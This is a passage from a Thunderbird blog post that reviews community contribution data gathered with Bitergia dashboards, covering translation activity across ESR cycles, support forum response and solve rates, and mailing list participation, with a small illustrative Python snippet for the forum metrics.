Naturally, any area of the project will see oscillating contribution patterns, and translations are no different. If we look at the last five years of translation contribution data, there are several insights we can take away. The number of contributors drops off after an ESR release and increases in a few bursts in the months prior to the next ESR release. In other words, historically, translations tend to happen toward the end of the ESR development cycle. Given this trend, if we compare the 115 ESR cycle (which started in earnest around January 2023) to the recent 128 ESR cycle (which started around December 2023), we see far more new contributors, indicating a healthier contributor community in 128 than in 115.

User Support Forums

Thus far we have talked about various code contributions that usually come from developers, but users supporting users is also incredibly important. We aim to foster a community that happily helps one another when they can, so let’s take a look at what the activity on our user support forums looks like in the Support Forums tab.

For more context, the data range for these screenshots of the user support forum dashboards has been set to the last 2 years instead of just the last year.

The good news is that we are getting faster at providing the first response to new questions. The first response is often the most important because it helps set the tone of the conversation.

The bad news is that we are getting slower at actually solving new questions, i.e. marking them as “Solved”. In the graph below, we see that over the last two years, a smaller percentage of our total questions are being marked as “Solved”, and the average time to solve them has grown.
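For illustration, the two forum metrics discussed here can be sketched like this, using synthetic question records (the field names are assumptions for the example, not the actual support.mozilla.org data model):

```python
from statistics import median

# Hypothetical support questions: hours until the first reply, and hours
# until the question was marked "Solved" (None = never solved).
questions = [
    {"first_reply_h": 2, "solved_h": 30},
    {"first_reply_h": 5, "solved_h": None},
    {"first_reply_h": 1, "solved_h": 72},
    {"first_reply_h": 3, "solved_h": None},
]

# Metric 1: typical time to first response.
median_first_reply = median(q["first_reply_h"] for q in questions)

# Metric 2: fraction of questions ever marked "Solved".
solved = [q["solved_h"] for q in questions if q["solved_h"] is not None]
solved_rate = len(solved) / len(questions)

print(median_first_reply)  # 2.5
print(solved_rate)         # 0.5
```

The trends described above correspond to the first number shrinking over time while the second also shrinks, which is exactly why more answerers are needed.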

The general takeaway is that we need help answering user support questions. If you are a knowledgeable Thunderbird user, please consider helping out your fellow users when you can.

Email List Discussions

Many open source projects use public mailing lists that anyone can participate in, and Thunderbird is no different. We use Topicbox as our mailing list platform to manage several topic-specific lists. The Thunderbird Topicbox is where you can find information on planned changes to the UI and codebase, beta testing, announcements and more. To view the Topicbox contributor data dashboard, head over to the Topicbox tab.

With our dashboards, we can see the experience level of discussion participants. As you might expect, seasoned participants make up most of the conversation. Thankfully, less experienced people feel comfortable enough to chime in as well. We want to encourage these newer contributors to keep providing their valuable input in these discussions!

Takeaways

Collating public contributor data has helped Thunderbird identify areas where we’re succeeding, as well as areas that need improvement to best support our contributor community. Through this partnership with Bitergia, we will seek to lower the barriers to contribution and enhance the overall contribution experience.

If you are an active or potential contributor and have thoughts on specific ways we can best support you, please let us know in the comments. We value your input!

If you are a leader in an open source project and wish to gather similar data on your community, please contact Bitergia for an excellent partnership experience. Tell them that Thunderbird sent you!

The post Open Source, Open Data: Visualizing Our Community with Bitergia appeared first on The Thunderbird Blog.